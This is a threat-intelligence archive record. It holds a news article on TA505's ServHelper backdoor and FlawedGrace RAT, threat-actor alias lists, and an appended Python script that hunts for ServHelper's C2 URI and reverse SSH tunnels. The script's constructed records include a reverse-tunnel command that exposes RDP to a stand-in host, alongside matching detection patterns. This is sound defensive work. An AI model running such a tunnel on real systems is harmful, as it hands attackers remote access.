{
	"id": "387feb6d-42fd-4c0e-84aa-b6139369b711",
	"created_at": "2026-04-06T00:20:13.803841Z",
	"updated_at": "2026-04-10T03:36:37.003548Z",
	"deleted_at": null,
	"sha1_hash": "ae3c24f39d2f6080a8a518e07dd7c2b195049ee7",
	"title": "TA505 Crime Gang Debuts Brand-New ServHelper Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 56473,
	"plain_text": "TA505 Crime Gang Debuts Brand-New ServHelper Backdoor\r\nBy Tara Seals\r\nPublished: 2019-01-11 · Archived: 2026-04-02 10:50:54 UTC\r\nThe latest malware from TA505 has been seen targeting banks, retailers and restaurants with two different\r\nversions.\r\nA new backdoor named ServHelper has been spotted in the wild, acting both as a remote desktop agent and as\r\na downloader for a RAT called FlawedGrace.\r\nAccording to Proofpoint, the prolific cybercriminal gang known as TA505 developed ServHelper, which has two\r\nvariants: one focused on remote desktop functions and a second that primarily functions as a downloader. It is\r\nnamed after the file names associated with the infection; a sample from one campaign used command\r\nand control (C2) URIs containing “/rest/serv.php.”\r\nThe primary motive is, as usual, financial: “TA505 appears to be actively targeting banks, retail businesses, and\r\nrestaurants as they distribute these malware families,” said Proofpoint researchers in a posting this week.\r\nResearchers said that the remote desktop version, a.k.a. the “tunnel” variant, was seen in November spreading via\r\na few thousand spam messages that contained Microsoft Word or Publisher attachments with macros that, when\r\nenabled, download and execute the malware. This version focuses on setting up reverse SSH tunnels to allow the\r\nthreat actor to access the infected host via Remote Desktop Protocol (RDP).\r\n“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to\r\nhijack legitimate user accounts or their web browser profiles and use them as they see fit,” according to\r\nProofpoint.\r\nA similar campaign consisting of tens of thousands of email messages surfaced later in November, according to\r\nProofpoint. In addition to financial institutions, this campaign also targeted the retail industry. 
The messages also\r\ncontained Microsoft Word or Publisher attachments with macros, along with Microsoft Wizard attachments. This\r\ncampaign used the downloader variant of ServHelper, the researchers said. This version is stripped of the tunneling\r\nand hijacking functionality and is used as a basic downloader.\r\nhttps://threatpost.com/ta505-servhelper-malware/140792/\r\nPage 1 of 2\n\nIn December, TA505 mixed it up with another downloader-variant campaign. It targeted retail and financial\r\nservices customers again, but this time used a mixture of Microsoft Word attachments with embedded malicious\r\nmacros; PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage (which linked to the\r\nmalware); and direct URLs in the email body linking to a ServHelper executable. It also added a new malware\r\npayload.\r\n“In this campaign, we observed ServHelper download and execute an additional malware that we call\r\nFlawedGrace,” according to Proofpoint. “FlawedGrace is a robust remote access trojan (RAT) that we initially\r\nencountered in November 2017, but have rarely observed since.”\r\nPer the malware’s debug strings, the last significant development of FlawedGrace took place at the end of\r\n2017. The ServHelper campaigns were distributing version 2.0.10 of the malware, which is related to the more\r\nwidely known FlawedAmmyy RAT.\r\nIn general, it appears that TA505 is enjoying its new toy: ServHelper is being actively developed.\r\n“New commands and functionality are being added to the malware in almost every new campaign,” Proofpoint\r\nresearchers noted.\r\nTA505, a well-resourced organized cybercrime ring, is known for ongoing malware authoring and development,\r\nwith everything from fully-fledged backdoors to what seems like beta-stage code making appearances in its\r\ncampaigns. In this case, ServHelper is unlikely to be a flash in the pan.\r\n“Threat actor TA505 is both consistent and prolific,” Proofpoint researchers said. 
“When the group distributes new\r\nmalware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky\r\nransomware it may become the dominant strain of malware in the wild. We will continue to observe the\r\ndistribution of these three malware variants but, at this time, they do not appear to be one-offs, but rather long-term investments by TA505.”\r\nThey added that this also extends the trend that emerged in 2018, in which threat actors increasingly focused on\r\ndistribution of downloaders, information stealers, RATs and “other malware that can remain resident on victim\r\ndevices for far longer than destructive, smash-and-grab malware like ransomware.”\r\nTo the latter point, it’s worth noting that TA505 was responsible for hundreds of Dridex campaigns beginning in\r\n2014, in addition to the massive Locky campaigns that came later. In all cases, hundreds of millions of malicious\r\nmessages were distributed worldwide.\r\nSource: https://threatpost.com/ta505-servhelper-malware/140792/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://threatpost.com/ta505-servhelper-malware/140792/"
	],
	"report_names": [
		"140792"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11",
				"GRACEFUL SPIDER",
				"SectorJ04",
				"Spandex Tempest",
				"TA505"
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434813,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.pdf",
		"text": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.txt",
		"img": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.jpg"
	}
}
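The article above gives a defender two concrete observables: the C2 URI ending in /rest/serv.php that Proofpoint reported for one ServHelper campaign, and the tunnel variant's reverse SSH tunnel that hands the operator RDP access to the infected host. The Python script below, added here as an illustration and not code from Threatpost, Proofpoint or the malware itself, runs both checks over constructed web-proxy and process-creation records. The IP addresses, hostnames, file paths and command lines are made up for the example, and the assumption that the tunnel is created with an OpenSSH- or plink-style `-R port:host:3389` command line is mine; the page does not say which SSH client ServHelper uses.

```python
"""Hunt for the two ServHelper observables described in the article (C2 URI and
reverse SSH tunnel exposing RDP) in proxy and process telemetry.
Added example; every record below is constructed, not real traffic."""
import re
from urllib.parse import urlsplit

# Constructed web-proxy records: (timestamp, client ip, method, url, status).
# 203.0.113.10 is documentation address space, not a real C2 server.
PROXY_EVENTS = [
    ("2019-01-10T09:14:02Z", "10.1.4.22", "POST", "http://203.0.113.10/rest/serv.php", 200),
    ("2019-01-10T09:15:11Z", "10.1.4.31", "GET", "https://intranet.example/rest/servers", 200),
    ("2019-01-10T09:16:40Z", "10.1.4.40", "GET", "https://www.example.org/index.html", 200),
]

# Constructed process-creation records: (timestamp, host, parent image, command line).
# The ServHelper.exe drop path and the ssh invocation are assumptions for illustration.
PROC_EVENTS = [
    ("2019-01-10T09:14:10Z", "WS-022", r"C:\Users\Public\ServHelper.exe",
     "ssh.exe -o StrictHostKeyChecking=no -N -R 6789:127.0.0.1:3389 relay@203.0.113.10"),
    ("2019-01-10T09:20:00Z", "WS-031", r"C:\Windows\explorer.exe",
     "ssh.exe -N -L 8080:127.0.0.1:80 dev@build.example"),
    ("2019-01-10T09:21:00Z", "WS-040", r"C:\Windows\explorer.exe",
     "mstsc.exe /v:fileserver.example"),
]

RDP_PORT = "3389"
# OpenSSH/plink remote forward: -R [bind_address:]port:host:hostport (space after -R optional)
REVERSE_FORWARD = re.compile(r"(?:^|\s)-R\s*(\S+)")
# Bare image name at the start of the command line or after a path separator
SSH_CLIENT = re.compile(r"(?:^|[\\/\s])(?:ssh|plink)(?:\.exe)?(?=\s|$)", re.IGNORECASE)


def is_servhelper_c2_uri(url: str) -> bool:
    """True when the URL path ends in /rest/serv.php, the C2 URI reported for one
    ServHelper campaign. Matching the parsed path, not the raw string, avoids
    firing on hostnames or query strings that merely contain the substring."""
    return urlsplit(url).path.lower().endswith("/rest/serv.php")


def reverse_tunnel_to_rdp(cmdline: str) -> bool:
    """True when an SSH client command line requests a remote (-R) forward whose
    target port is RDP, i.e. the host's own RDP service is being exposed to the
    SSH server the way the tunnel variant is described as doing."""
    if not SSH_CLIENT.search(cmdline):
        return False
    for spec in REVERSE_FORWARD.findall(cmdline):
        fields = spec.split(":")
        # A forward spec has at least port:host:hostport; the hostport is the last field.
        if len(fields) >= 3 and fields[-1] == RDP_PORT:
            return True
    return False


def scan(proxy_events=PROXY_EVENTS, proc_events=PROC_EVENTS) -> list[dict]:
    """Return one finding per matching record, tagged with the observable it hit.
    The parent image is kept in the finding so an analyst can tell a malware-spawned
    tunnel from an administrator's own ssh session."""
    findings = []
    for ts, client, method, url, _status in proxy_events:
        if is_servhelper_c2_uri(url):
            findings.append({"type": "c2_uri", "when": ts, "where": client,
                             "detail": f"{method} {url}"})
    for ts, host, parent, cmdline in proc_events:
        if reverse_tunnel_to_rdp(cmdline):
            findings.append({"type": "reverse_ssh_rdp", "when": ts, "where": host,
                             "detail": f"{parent} -> {cmdline}"})
    return findings


if __name__ == "__main__":
    for f in scan():
        print(f"[{f['type']}] {f['when']} {f['where']}: {f['detail']}")
```

On the constructed data the scan returns two findings: the POST to /rest/serv.php from 10.1.4.22, and the `ssh.exe -R ...:3389` launched under ServHelper.exe on WS-022; the local forward (`-L`) and the ordinary mstsc session are left alone. A legitimate administrator publishing RDP through a reverse tunnel would also trigger the second rule, which is why the finding carries the parent process: a tunnel whose parent is an executable in a user-writable directory, as in the constructed record, is the case worth escalating.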